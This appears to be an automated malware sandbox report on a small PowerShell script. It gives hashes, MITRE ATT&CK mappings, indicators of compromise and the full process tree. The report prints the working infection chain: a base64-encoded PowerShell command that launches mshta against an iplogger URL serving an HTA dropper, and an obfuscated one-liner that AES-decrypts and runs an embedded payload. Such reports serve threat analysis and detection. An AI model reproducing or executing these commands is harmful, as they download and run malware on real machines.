f7fc589159c172d86743f75f07aca592287438957927775d2531572ae0a03beb

General

Target

9a4e23a8c02bdde3512bc6bc2bbd5c4f887994bedefae18944b820a0ee236855.ps1
Size

131B
MD5

5af4a5a13fc361303f37483b171c1c65
SHA1

8d0052f96c26ef0117455de45e15b311d4946f75
SHA256

9a4e23a8c02bdde3512bc6bc2bbd5c4f887994bedefae18944b820a0ee236855
SHA512

85221585c7851b780c5fa5d39ab3cd9f09e3d9b6c4b29ac1bdf7fac94ce772488c3b5605ea38cf691e6d076f430b10f65be38bcc74387d70aeb7c60147bb61a8

Score

10^/10

execution

Malware Config

Extracted

Language

hta

Source

URLs

hta.dropper

https://iplogger.co/2vJ7b7

Signatures

Blocklisted process makes network request 4 IoCs

flow	pid	Process
5	2312	mshta.exe
7	2312	mshta.exe
9	2312	mshta.exe
10	2740	powershell.exe

Downloads MZ/PE file

Command and Scripting Interpreter: PowerShell 1 TTPs 3 IoCs

Using powershell.exe command.

execution

PowerShell

T1059.001

pid	Process
2240	powershell.exe
2276	powershell.exe
2740	powershell.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

Modifies Internet Explorer settings 1 TTPs 1 IoCs

adware spyware

Modify Registry

T1112

description	ioc	Process
Key created	\REGISTRY\USER\S-1-5-21-2872745919-2748461613-2989606286-1000\Software\Microsoft\Internet Explorer\Main	mshta.exe

Suspicious behavior: EnumeratesProcesses 3 IoCs

pid	Process
2240	powershell.exe
2276	powershell.exe
2740	powershell.exe

Suspicious use of AdjustPrivilegeToken 3 IoCs

description	pid	Process
Token: SeDebugPrivilege	2240	powershell.exe
Token: SeDebugPrivilege	2276	powershell.exe
Token: SeDebugPrivilege	2740	powershell.exe

Suspicious use of WriteProcessMemory 9 IoCs

description	pid	Process	procid_target
PID 2240 wrote to memory of 2276	2240	powershell.exe	31
PID 2240 wrote to memory of 2276	2240	powershell.exe	31
PID 2240 wrote to memory of 2276	2240	powershell.exe	31
PID 2276 wrote to memory of 2312	2276	powershell.exe	32
PID 2276 wrote to memory of 2312	2276	powershell.exe	32
PID 2276 wrote to memory of 2312	2276	powershell.exe	32
PID 2312 wrote to memory of 2740	2312	mshta.exe	34
PID 2312 wrote to memory of 2740	2312	mshta.exe	34
PID 2312 wrote to memory of 2740	2312	mshta.exe	34

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -ExecutionPolicy bypass -File C:\Users\Admin\AppData\Local\Temp\9a4e23a8c02bdde3512bc6bc2bbd5c4f887994bedefae18944b820a0ee236855.ps1
1⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:2240
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass -eC bQBzAGgAdABhACAAaAB0AHQAcABzADoALwAvAGkAcABsAG8AZwBnAGUAcgAuAGMAbwAvADIAdgBKADcAYgA3AA==
  2⤵
  - Command and Scripting Interpreter: PowerShell
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of WriteProcessMemory
  PID:2276
- - C:\Windows\system32\mshta.exe
    "C:\Windows\system32\mshta.exe" https://iplogger.co/2vJ7b7
    3⤵
    - Blocklisted process makes network request
    - Modifies Internet Explorer settings
    - Suspicious use of WriteProcessMemory
    PID:2312
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w 1 -ep Unrestricted -nop function iXIQXG($tvnOyfW){return -split ($tvnOyfW -replace '..', '0x$& ')};$kQFqNP = iXIQXG('C9F2793CB7769DE8EE92CC187747074745E3EA3043439C3196B18B2757689F43B821EA6C49193515DC2E82AD9551B8DA597D522159538BB47FDF58446356ED06AFD674F314AEBB1BCBB8B389A09A43537B6EF98A06D7EEAB3A4E5E71391C3FEDF5F90DB240D8258DE9EB1795D4F48833745D4D417EAD9B69112F5FF18835196FD76257367BC2D600D96AA785829B201DE2986A042D1AD6B5FE167598B3DE3CC06180EC8FB0CB078EBFAD4C02221A5FB30D17D9D25C70AC71809D797C0245B5F8CABBAE2178CEDEBD2D7EC56CA0C178E4EB48D65D4285F9AECEFFCDF20CA74CA31E806F785A4244E9B42ADF61A64A9C3CE875961A8754175DE272D455C84FD1DBB61AF31269275952C62DABD14F6074953F666D2D5E0FD47BF227BA835960D619ACEC649153EE52D42A760B5362C0221A6D1C084DD374A748C78EF4B9DCF67A1CEFD1A222476998D564E00D98E3FF7CA037D2E853780AD9DC54287D64D014A75BAAAE84F8BAE53E72CE9AB1C55353098D4EDA82F50FC9ADC08BDB53F14383679E795A9E44A1D5A16F1CB93DA991822AD642FBBEC06E60DEB14E23EDB5F1CA02CDA7D36F3C5AE9CD89CC7B97618682D05CB82A1A7C2C40BF22DCB2EFAB9E028C0E687EEDB4E09E58768AF9C435821A6A745E1B42D453BA2F591C1225D048542D082E0840C14AAF7669195909D670B9AF8AB9CC70CE0AEF64655E2B09C8A41D09522373BB3C3850035CF63F0D0E987F14B5DFF25D614BD2BF1BCCE9600E0D2C0C6E98AD925CE73A81802803EE751B8362A72E80C4A7CE6D0961DA1C5E346A1B0C427FFA73444F91B06E5AD38B4EC4B9569BC84CC33C8BCB1E7E7B6E9C4C2B59B60482411C849227A8F93C2EEF8B56805DE728C239BD77B408FDCF1C3CFB7EEA1781F6B1D73F8865F212F5F7FBD08E27F6C06D94F096325A9092CE310925BCE43C8E02A9C3AE9E757F1DF657E24EE9C638FF1D348BB7CB1BF85603E8E7854B9E5170960F941780BBF18D793FD32FD6F59DF06CF294A907ACEA1D0518FFAA6A437D8EB26A69877ACC6515B87BBB76404D73AE6B9669DD740C912D1077C73B9D60CE15C24DB50454441730E4BA62DBAF14A2A2F7628B0EA85CD1B4BE48B76F46B4370445DC50F9DFADBA3530B30C788E848AFA455F8B65A42DC59AD970D65D36133AFBD6F44085DE216AA4E84977AC231E8554BBF8DF0E0E65593E094B323F42F3717AD9E4F6C81BB0829860308F18E1C2F92CEFF64B637157C7DD2B706B3817EAB68C0ACD89B81A37437F2220C394F99D56AEB23566D1D1A3D89EA0E2DDF99DAE2AB169799851B72D174076E98344909FAAD644910164C3338D23875E6F759AC54C260B9057D42351C7F82AFEF5A0068557288353343026D1C957374105161CF024965EEAC69185C6B963E102AD8D548121923C49EC3AAEF113E099C0E164C7EFE464199F58334D35EE85F26820F9060B8D06FC20B255A124A671A73B5A1CADF2514E906E140A7390CFD0FEBEE41E9163FD65368105A233DB8D4D9A66D6404226FDE4F4E0C86ED34355FE957618FF32BA29898B0E8857603D4CE47A2D0159F44A6C59845F4063325CFE737B538B10EF7357B6227BEB16DA7D69FC4374E35BFAA069B91BA79B32000C05DC625A0B2A32B1F9A83CED6271FFC07729E9572F835578FFB8410ED2518B246D83B0834094C34FC68C53478228858D5B14D6963B99FDC3DD615A3C5EE38440B3A13B34FA7349F53F8AEB12EDB0ACED2949A18F74E6A80BD57A959246CE42267D922C69426620DBC59841707BC20994ECB84361B763F7607003699FF9C7F08C1448D6BB003E18D055D441F4E91A142418A51EB4C0FD2E1054FA');$hRQJT = [System.Security.Cryptography.Aes]::Create();$hRQJT.Key = iXIQXG('4D5754704F764A527165755858615A58');$hRQJT.IV = New-Object byte[] 16;$ymWKAgnI = $hRQJT.CreateDecryptor();$GNhLuFfFx = $ymWKAgnI.TransformFinalBlock($kQFqNP, 0, $kQFqNP.Length);$WVrcoNzKK = [System.Text.Encoding]::Utf8.GetString($GNhLuFfFx);$ymWKAgnI.Dispose();& $WVrcoNzKK.Substring(0,3) $WVrcoNzKK.Substring(3)
      4⤵
      Blocklisted process makes network request
      Command and Scripting Interpreter: PowerShell
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:2740

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

1

T1059

PowerShell

1

T1059.001

Persistence

Privilege Escalation

Defense Evasion

Modify Registry

1

T1112

Credential Access

Discovery

System Information Discovery

1

T1082

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms

Filesize
7KB

MD5
8dc5a399c7da106574314996a48f1ce1

SHA1
83ca5125527ddea86a9f5f773730afc86295fcc0

SHA256
6c3356d724d122a2663bf0d851acd932c7c626b39c4313fd11b4e934db014ab9

SHA512
e9911bd92b8d5edc1c9a2789a93ef231e6c7baef45c7daa2cd4371f6b7a8ba18f55fe2458ee14cf5437271772751dc4385db50db6bdc8bd7d98a2fc24c424075

Download Submit
memory/2240-4-0x000007FEF5C2E000-0x000007FEF5C2F000-memory.dmp

Filesize
4KB

Download
memory/2240-5-0x000000001B5B0000-0x000000001B892000-memory.dmp

Filesize
2.9MB

Download
memory/2240-6-0x0000000001D20000-0x0000000001D28000-memory.dmp

Filesize
32KB

Download
memory/2240-7-0x000007FEF5970000-0x000007FEF630D000-memory.dmp

Filesize
9.6MB

Download
memory/2240-8-0x000007FEF5970000-0x000007FEF630D000-memory.dmp

Filesize
9.6MB

Download
memory/2240-9-0x000007FEF5970000-0x000007FEF630D000-memory.dmp

Filesize
9.6MB

Download
memory/2240-17-0x000007FEF5970000-0x000007FEF630D000-memory.dmp

Filesize
9.6MB

Download
memory/2276-15-0x000007FEF5970000-0x000007FEF630D000-memory.dmp

Filesize
9.6MB

Download
memory/2276-16-0x000007FEF5970000-0x000007FEF630D000-memory.dmp

Filesize
9.6MB

Download
memory/2740-39-0x000000001B6B0000-0x000000001B992000-memory.dmp

Filesize
2.9MB

Download
memory/2740-40-0x00000000028E0000-0x00000000028E8000-memory.dmp

Filesize
32KB

Download

Analysis

Sharing